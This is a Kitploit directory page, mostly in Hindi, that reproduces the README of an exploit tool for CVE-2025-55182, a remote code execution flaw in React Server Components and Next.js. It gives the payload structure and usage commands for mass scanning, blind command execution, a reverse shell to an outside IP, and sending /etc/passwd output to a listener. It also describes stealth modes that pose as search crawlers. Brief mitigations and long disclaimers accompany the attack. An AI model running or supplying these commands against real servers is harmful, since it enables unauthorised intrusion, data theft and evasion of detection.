Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-exp — CVE-2025-55182 React Server Components दूरस्थ कोड निष्पादन शोषण उपकरण | Kitploit
उपकरण/GitHubGitHub/spritualkb/cve-2025-55182-exp
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubspritualkb/cve-2025-55182-exp

CVE-2025-55182-exp

CVE-2025-55182 React Server Components दूरस्थ कोड निष्पादन शोषण उपकरण

461239 महीने पहलेKitploit द्वारा समीक्षित
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182-exp

CVE Type Python License

🔥 अवलोकन

CVE-2025-55182 एक महत्वपूर्ण रिमोट कोड निष्पादन (RCE) भेद्यता है, जो रिएक्ट सर्वर घटकों (RSC) में है और यह Next.js अनुप्रयोगों को प्रभावित करती है जो App Router और Server Actions का उपयोग करते हैं। यह भेद्यता Flight प्रोटोकॉल डिसीरियलाइज़ेशन प्रक्रिया में मौजूद है, जिससे हमलावर प्रोटोटाइप प्रदूषण (प्रोटोटाइप पोल्यूशन) के माध्यम से मनमाना कोड निष्पादन प्राप्त कर सकते हैं।

⚠️ अस्वीकरण / 免责声明

केवल अधिकृत सुरक्षा परीक्षण के लिए

यह उपकरण केवल शैक्षिक और अधिकृत पेनिट्रेशन परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। इस उपकरण का कोई भी अवैध या अनधिकृत उपयोग पूरी तरह से उपयोगकर्ता की जिम्मेदारी है। लेखक किसी भी प्रकार की कोई देयता स्वीकार नहीं करता।

本工具仅供授权安全测试和教育目的使用。如有任何违规、非法操作,一切后果由使用者自行承担,与本人无关。

कृपया इस उपकरण का उपयोग करने से पहले पूर्ण DISCLAIMER.md पढ़ें।

इस उपकरण का उपयोग करके, आप सहमत हैं कि:

  • आपने किसी भी परीक्षण के लिए उचित प्राधिकरण प्राप्त किया है
  • आप सभी लागू कानूनों और विनियमों का अनुपालन करेंगे
  • आप अपने कार्यों की पूरी जिम्मेदारी स्वीकार करते हैं
  • लेखक किसी भी दुरुपयोग के लिए कोई देयता वहन नहीं करता

📋 प्रभावित संस्करण

घटकप्रभावित संस्करण
react-server-dom-webpack19.0.0 - 19.2.0
Next.js15.x, 16.x (App Router + Server Actions)

🛠️ स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp

# Install dependencies
pip install requests
pip install requests[socks]  # For SOCKS5 proxy support

📖 उपयोग

एकल लक्ष्य की जाँच करें

root@kitploit:~
python3 exploit.py http://target:3000 --check

फ़ाइल से बैच स्कैन

root@kitploit:~
# Basic batch scan
python3 exploit.py -f targets.txt --check

# With stealth mode and delay
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2

# Save vulnerable targets to file
python3 exploit.py -f targets.txt --check -o vulnerable.txt

कमांड निष्पादित करें (ब्लाइंड RCE)

root@kitploit:~
python3 exploit.py http://target:3000 -c "id"

रिवर्स शेल

root@kitploit:~
# Start listener first
nc -lvnp 4444

# Execute reverse shell
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444

कमांड आउटपुट बाहर निकालें

root@kitploit:~
# Start listener
nc -lvnp 4444

# Execute and exfiltrate output
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

प्रॉक्सी का उपयोग

root@kitploit:~
python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080

🎭 स्टील्थ मोड

मोडविवरण
browserवास्तविक ब्राउज़र अनुरोधों की नकल करता है (डिफ़ॉल्ट)
crawlerखोज इंजन क्रॉलर (Googlebot, Baiduspider, आदि) की नकल करता है
securityसुरक्षा स्कैनर User-Agents का उपयोग करता है

🔧 विकल्प

विकल्पविवरण
targetलक्ष्य URL (जैसे, http://localhost:3000)
-f, --fileलक्ष्य URL वाली फ़ाइल (प्रति पंक्ति एक)
-o, --outputकमजोर लक्ष्यों के लिए आउटपुट फ़ाइल
-c, --commandनिष्पादित करने के लिए कमांड (अंधा)
--checkभेद्यता की जाँच करें
--proxySOCKS5 प्रॉक्सी (जैसे, socks5://127.0.0.1:1080)
--stealthस्टील्थ मोड: browser, crawler, security
--delayअनुरोधों के बीच विलंब सेकंड में
--variantsव्यापक जाँच के लिए कई पेलोड वेरिएंट का उपयोग करें
--revshell IP PORTIP:PORT पर रिवर्स शेल
--exfil CMD IP PORTCMD निष्पादित करें और आउटपुट को IP:PORT पर भेजें
-t, --timeoutअनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 15)

🔬 तकनीकी विवरण

भेद्यता तंत्र

यह एक्सप्लॉइट Flight प्रोटोकॉल डिसीरियलाइज़ेशन में प्रोटोटाइप प्रदूषण का लाभ उठाता है:

  1. प्रोटोटाइप प्रदूषण: "$1:__proto__:then" के माध्यम से Object.prototype.then को प्रदूषित करता है
  2. फ़ंक्शन कंस्ट्रक्टर एक्सेस: "$1:constructor:constructor" के माध्यम से _formData.get को Function कंस्ट्रक्टर पर सेट करता है
  3. कोड इंजेक्शन: _prefix के माध्यम से दुर्भावनापूर्ण कोड इंजेक्ट करता है जो Function() को पास किया जाता है

पेलोड संरचना

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "<malicious_code>",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

📁 फ़ाइल संरचना

root@kitploit:~
CVE-2025-55182-exp/
├── exploit.py      # Main exploit script
├── targets.txt     # Target URLs list (one per line)
└── README.md       # This file

📝 targets.txt प्रारूप

root@kitploit:~
# Comments start with #
http://target1.com:3000
https://target2.com
target3.com:3000

🛡️ शमन उपाय

  1. अपडेट करें react-server-dom-webpack और Next.js के नवीनतम पैच संस्करणों में
  2. लागू करें सर्वर क्रियाओं पर इनपुट सत्यापन
  3. उपयोग करें दुर्भावनापूर्ण Flight प्रोटोकॉल पेलोड का पता लगाने के लिए वेब एप्लिकेशन फायरवॉल (WAF) नियम
  4. मॉनिटर करें प्रोटोटाइप-संबंधित संदेशों के साथ असामान्य सर्वर-साइड त्रुटियों (HTTP 500) के लिए

📜 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।


⚠️ कानूनी अस्वीकरण / 法律免责声明

अंग्रेज़ी

उपयोग की शर्तें

इस सॉफ़्टवेयर को डाउनलोड करके, कॉपी करके, इंस्टॉल करके या उपयोग करके, आप इस अस्वीकरण की शर्तों से बंधने के लिए सहमत होते हैं।

इच्छित उद्देश्य

यह उपकरण विशेष रूप से के लिए डिज़ाइन किया गया है:

  • अधिकृत पेनिट्रेशन परीक्षण
  • सुरक्षा अनुसंधान और शिक्षा
  • उचित प्राधिकरण के साथ भेद्यता मूल्यांकन
  • CTF (कैप्चर द फ़्लैग) प्रतियोगिताएं
  • व्यक्तिगत प्रयोगशाला वातावरण

निषिद्ध उपयोग

आप इस उपकरण का उपयोग नहीं करेंगे:

  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच
  • किसी भी अवैध गतिविधि
  • स्पष्ट लिखित अनुमति के बिना सिस्टम पर हमला करना
  • किसी भी सिस्टम या डेटा को नुकसान पहुंचाना
  • कोई भी गतिविधि जो स्थानीय, राज्य, राष्ट्रीय या अंतरराष्ट्रीय कानूनों का उल्लंघन करती हो

कोई वारंटी नहीं

यह सॉफ़्टवेयर "बिना किसी वारंटी के" प्रदान किया जाता है, चाहे वह स्पष्ट हो या निहित। लेखक सभी वारंटियों को अस्वीकार करते हैं, जिनमें शामिल हैं लेकिन इन्हीं तक सीमित नहीं:

  • विक्रयक्षमता
  • किसी विशेष उद्देश्य के लिए उपयुक्तता
  • गैर-उल्लंघन

देयता की सीमा

किसी भी स्थिति में लेखक किसी के लिए उत्तरदायी नहीं होंगे:

  • प्रत्यक्ष, अप्रत्यक्ष, आकस्मिक, विशेष, अनुकरणीय या परिणामी क्षति
  • डेटा, लाभ या व्यावसायिक अवसरों की हानि
  • इस उपकरण के दुरुपयोग से उत्पन्न कानूनी परिणाम

उपयोगकर्ता की जिम्मेदारी

उपयोगकर्ता पूरी जिम्मेदारी मानता है:

  • किसी भी सिस्टम का परीक्षण करने से पहले उचित प्राधिकरण प्राप्त करना
  • सभी लागू कानूनों और विनियमों का अनुपालन
  • इस उपकरण के उपयोग से उत्पन्न कोई भी परिणाम
  • अपने अधिकार क्षेत्र में अपने कार्यों की वैधता सुनिश्चित करना

स्वीकृति

इस उपकरण का उपयोग करके, आप स्वीकार करते हैं कि:

  1. आपने इस अस्वीकरण को पढ़ और समझ लिया है
  2. आप इस उपकरण का उपयोग केवल कानूनी और अधिकृत उद्देश्यों के लिए करेंगे
  3. आप इस उपकरण के उपयोग से जुड़े सभी जोखिमों को स्वीकार करते हैं
  4. लेखक किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं वहन करते

中文

使用条款

下载、复制、安装或使用本软件即表示您同意受本免责声明条款的约束。

预期用途

本工具仅用于:

  • 授权的渗透测试
  • 安全研究和教育
  • 经过适当授权的漏洞评估
  • CTF(夺旗赛)比赛
  • 个人实验室环境

禁止用途

您不得将本工具用于:

  • 未经授权访问计算机系统
  • 任何非法活动
  • 在没有明确书面许可的情况下攻击系统
  • 对任何系统或数据造成损害
  • 任何违反当地、州、国家或国际法律的活动

无担保声明

本软件按"原样"提供,不提供任何明示或暗示的担保。作者否认所有担保,包括但不限于:

  • 适销性
  • 特定用途的适用性
  • 非侵权性

责任限制

在任何情况下,作者均不对以下情况承担责任:

  • 直接、间接、附带、特殊、惩戒性或后果性损害
  • 数据、利润或商业机会的损失
  • 因滥用本工具而产生的法律后果

用户责任

用户对以下事项承担全部责任:

  • 在测试任何系统之前获得适当的授权
  • 遵守所有适用的法律法规
  • 使用本工具产生的任何后果
  • 确保其行为在其管辖范围内的合法性

确认声明

使用本工具即表示您确认:

  1. 您已阅读并理解本免责声明
  2. 您将仅将本工具用于合法和授权的目的
  3. 您接受与使用本工具相关的所有风险
  4. 作者对任何滥用行为不承担任何责任

法律参考 / Legal References

相关法律 / Relevant Laws

  • 中国: 《中华人民共和国网络安全法》、《中华人民共和国刑法》第285条、第286条
  • USA: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
  • EU: Directive 2013/40/EU on attacks against information systems
  • UK: Computer Misuse Act 1990

授权测试要求 / Authorization Requirements

在进行任何安全测试之前,您必须:

  1. 获得系统所有者的书面授权
  2. 明确定义测试范围和边界
  3. 遵守所有适用的法律法规
  4. 记录所有测试活动

Before conducting any security testing, you must:

  1. Obtain written authorization from the system owner
  2. Clearly define the scope and boundaries of testing
  3. Comply with all applicable laws and regulations
  4. Document all testing activities

⚠️ 未经授权的计算机访问是违法行为 ⚠️
⚠️ 未经授权的计算机访问是违法行为 ⚠️

⚠️ अनधिकृत कंप्यूटर पहुंच एक आपराधिक अपराध है ⚠️
⚠️ Unauthorized computer access is a criminal offense ⚠️

टूल डाउनलोड करें